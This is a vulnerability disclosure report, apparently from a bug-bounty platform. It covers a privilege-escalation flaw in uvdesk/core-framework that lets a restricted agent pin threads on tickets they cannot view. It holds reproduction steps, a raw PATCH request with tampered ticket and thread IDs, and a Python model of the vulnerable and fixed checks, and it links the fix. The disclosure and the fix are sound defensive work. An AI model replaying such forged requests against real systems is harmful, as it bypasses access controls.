Improper Privilege Management in uvdesk/core-framework
Reported on
Jul 19th 2021
✍️ BUG
Privilege escalation: an agent can pin threads on tickets they are not permitted to view.
🕵️♂️ Proof of Concept
1. First, from the admin account, go to http://localhost/uvdesk/public/en/member/agents
and add a new user called user B with the Agent role.
Now give user B all ticketing permissions, such as update/add/edit/delete/lock/pin a ticket, etc.
Also give the following permission:
Ticket View--->Individual Access
So here user B can access only tickets that are assigned to him.
2. Now, as admin, create a new ticket; the ticket URL will be like http://localhost/uvdesk/public/en/member/ticket/view/1 .
Don't assign this ticket to user B.
So user B should not be able to see this ticket.
3. Now go to user B's account. Here user B cannot see the above ticket using the URL http://localhost/uvdesk/public/en/member/ticket/view/1 ;
user B gets permission denied.
Finally, user B sends the request below to pin a thread:
PATCH /en/member/thread/action/6884640 HTTP/1.1
Host: bbounty.uvdesk.com
Cookie: cf_clearance=ef9a97e5ca3741a3a96a4c9831b71f8079ef6ac4-1626160435-0-250; UVSESSID=0000000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bbounty.uvdesk.com/en/member/ticket/view/2
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: https://bbounty.uvdesk.com
Te: trailers
Connection: close
ACCOUNT: TEST2
{"bookmark":1,"id":6884640,"ticketId":"1381331","updateType":"bookmark"}
In this request, change the ticket ID and thread ID (the thread ID appears in the URL and in the body, the ticket ID in the body) to those of the ticket user B cannot view, forward the request, and observe that the thread is pinned by user B, who does not have permission to view that ticket.
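To make the missing check concrete, here is a small Python model of the authorization decision behind the steps above. This is an added example, not code from uvdesk or from the reporter; the data model, the permission names, the "individual"/"all" view-scope flag, the function names and the status codes are assumptions chosen for illustration, and the real fix is the linked commit. The vulnerable variant checks only the role-level "pin" permission, as the PoC demonstrates; the fixed variant resolves the thread's ticket server-side and applies the same visibility rule the ticket view page enforces before mutating anything.

```python
# Added example (not uvdesk code): a minimal model of the missing
# authorization check behind the PoC above. Data model, names and
# status codes are assumptions for illustration.
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, Optional


@dataclass(frozen=True)
class Agent:
    id: int
    permissions: FrozenSet[str]   # role-level ticket permissions, e.g. {"pin", "lock"}
    view_scope: str               # "all" or "individual" (Ticket View -> Individual Access)


@dataclass
class Ticket:
    id: int
    assigned_agent_id: Optional[int]


@dataclass
class Thread:
    id: int
    ticket_id: int                # authoritative ticket, stored server-side
    pinned: bool = False


@dataclass
class Store:
    tickets: Dict[int, Ticket] = field(default_factory=dict)
    threads: Dict[int, Thread] = field(default_factory=dict)


def can_view_ticket(agent: Agent, ticket: Ticket) -> bool:
    """Same rule the ticket view page enforces: with Individual Access an
    agent may only see tickets assigned to them."""
    if agent.view_scope == "all":
        return True
    if agent.view_scope == "individual":
        return ticket.assigned_agent_id == agent.id
    return False


def pin_thread_vulnerable(store: Store, agent: Agent, payload: dict) -> int:
    """Pre-fix behaviour as described in the report: only the role permission
    is checked, so any agent holding 'pin' can act on any thread id."""
    if "pin" not in agent.permissions:
        return 403
    thread = store.threads.get(payload["id"])
    if thread is None:
        return 404
    thread.pinned = bool(payload.get("bookmark"))
    return 200


def pin_thread_fixed(store: Store, agent: Agent, payload: dict) -> int:
    """Hardened version: look the ticket up from the thread (never from the
    client-supplied 'ticketId') and apply the ticket visibility rule first."""
    if "pin" not in agent.permissions:
        return 403
    thread = store.threads.get(payload["id"])
    if thread is None:
        return 404
    ticket = store.tickets[thread.ticket_id]
    if not can_view_ticket(agent, ticket):
        return 403
    thread.pinned = bool(payload.get("bookmark"))
    return 200


def build_store() -> Store:
    """Constructed fixture mirroring the PoC: ticket 1 is the admin's unassigned
    ticket, ticket 2 is assigned to user B; thread ids are illustrative."""
    return Store(
        tickets={1: Ticket(id=1, assigned_agent_id=None),
                 2: Ticket(id=2, assigned_agent_id=2)},
        threads={6884640: Thread(id=6884640, ticket_id=1),
                 7: Thread(id=7, ticket_id=2)},
    )


def demo() -> Dict[str, object]:
    """User B (Agent role, Individual Access, all ticketing permissions) pins a
    thread on ticket 1, which is not assigned to them. The forged payload keeps
    the PoC's shape; its ticketId is attacker-controlled and points at a ticket
    user B *is* allowed to see, which must not grant access."""
    user_b = Agent(id=2, view_scope="individual",
                   permissions=frozenset({"update", "add", "edit", "delete", "lock", "pin"}))
    forged = {"bookmark": 1, "id": 6884640, "ticketId": "2", "updateType": "bookmark"}
    legit = {"bookmark": 1, "id": 7, "ticketId": "2", "updateType": "bookmark"}
    store_v, store_f = build_store(), build_store()
    return {
        "vulnerable_forged": pin_thread_vulnerable(store_v, user_b, forged),
        "vulnerable_pinned": store_v.threads[6884640].pinned,
        "fixed_forged": pin_thread_fixed(store_f, user_b, forged),
        "fixed_pinned": store_f.threads[6884640].pinned,
        "fixed_legit": pin_thread_fixed(store_f, user_b, legit),
    }


if __name__ == "__main__":
    print(demo())
```

The point of the fixed variant is that the thread id alone determines which ticket is affected, so the check has to be derived from server-side state rather than from anything in the request body; the same rule applies to every other updateType the thread action endpoint accepts, not only bookmark.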
💥 Impact
Privilege escalation: an agent restricted to Individual Access can pin threads on tickets that are not assigned to them and that they cannot view, because the thread action endpoint does not apply the ticket access check.
We found this bug in the uvdesk open source project, and we fixed it here: https://github.com/uvdesk/core-framework/commit/1591db934af9e36f830834c0acddbc8d8528750e
@uvdesk - should this be marked as invalid?
Just checking on behalf of @ranjit-git.
I had marked it invalid by mistake, but it was a genuine issue, and we fixed it here.
It looks like the issue is in a different repository, compared to the repository mentioned in this report?
@maintainer @ranjit-git - I have updated the report to point to the correct repository, and have reset the status of the report to pending. Feel free to mark as valid and confirm the patch when you are ready.